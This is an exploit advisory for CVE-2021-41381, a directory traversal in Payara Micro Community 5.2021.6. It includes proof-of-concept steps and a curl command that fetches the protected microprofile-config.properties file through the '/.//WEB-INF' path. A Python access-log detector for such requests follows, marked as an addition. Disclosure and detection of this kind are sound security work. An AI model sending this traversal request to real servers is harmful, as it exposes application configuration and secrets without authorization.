# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381

https://nvd.nist.gov/vuln/detail/CVE-2021-41381

Proof of Concept:

Step 1: Open the browser and check the version of the Payara software.

Step 2: Add this path at the end of the URL:

/.//WEB-INF/classes/META-INF/microprofile-config.properties

Step 3: Check whether the response contains either of these strings:

"payara.security.openid.default.providerURI="
"payara.security.openid.sessionScopedConfiguration=true"

Step 4: If any of these strings appear in the response, the application is vulnerable to the Directory Traversal vulnerability.

Step 5: Alternatively, use curl with this command:

Request:

curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties

Reference:
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
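
A log check for the request pattern in the steps above, added here as an example (it is not part of the original advisory or of Payara's code). It assumes an access log in common log format that records the raw request target; the function names and sample lines are constructed for illustration, and the normalization goes beyond the single path shown to also cover encoded and case-varied forms.

```python
import re
from urllib.parse import unquote

# Directories a servlet container must never serve to clients.
PROTECTED = {"web-inf", "meta-inf"}
# Request target inside a common/combined log format entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def normalized_segments(raw_path):
    """Return the path segments left after decoding and normalization."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):  # repeat so double-encoded input is resolved too
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.replace("\\", "/").split("/"):
        seg = seg.split(";", 1)[0]  # drop path parameters such as ;jsessionid
        if seg in ("", "."):
            continue  # "/./" and "//" add nothing to the resolved path
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return segments

def is_protected_access(raw_path):
    # True when the resolved path enters WEB-INF or META-INF (any letter case).
    return any(s.lower() in PROTECTED for s in normalized_segments(raw_path))

def flag_log_lines(lines):
    """Return the request targets in the log lines that reach protected dirs."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and is_protected_access(match.group(1)):
            hits.append(match.group(1))
    return hits

# Constructed sample entries (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '192.0.2.10 - - [01/Oct/2021:10:00:05 +0000] "GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Oct/2021:10:01:00 +0000] "GET /docs/web-info.html HTTP/1.1" 200 220',
]
```

A flagged request that returned status 200 means the protected file was served and the configuration values in it should be treated as exposed.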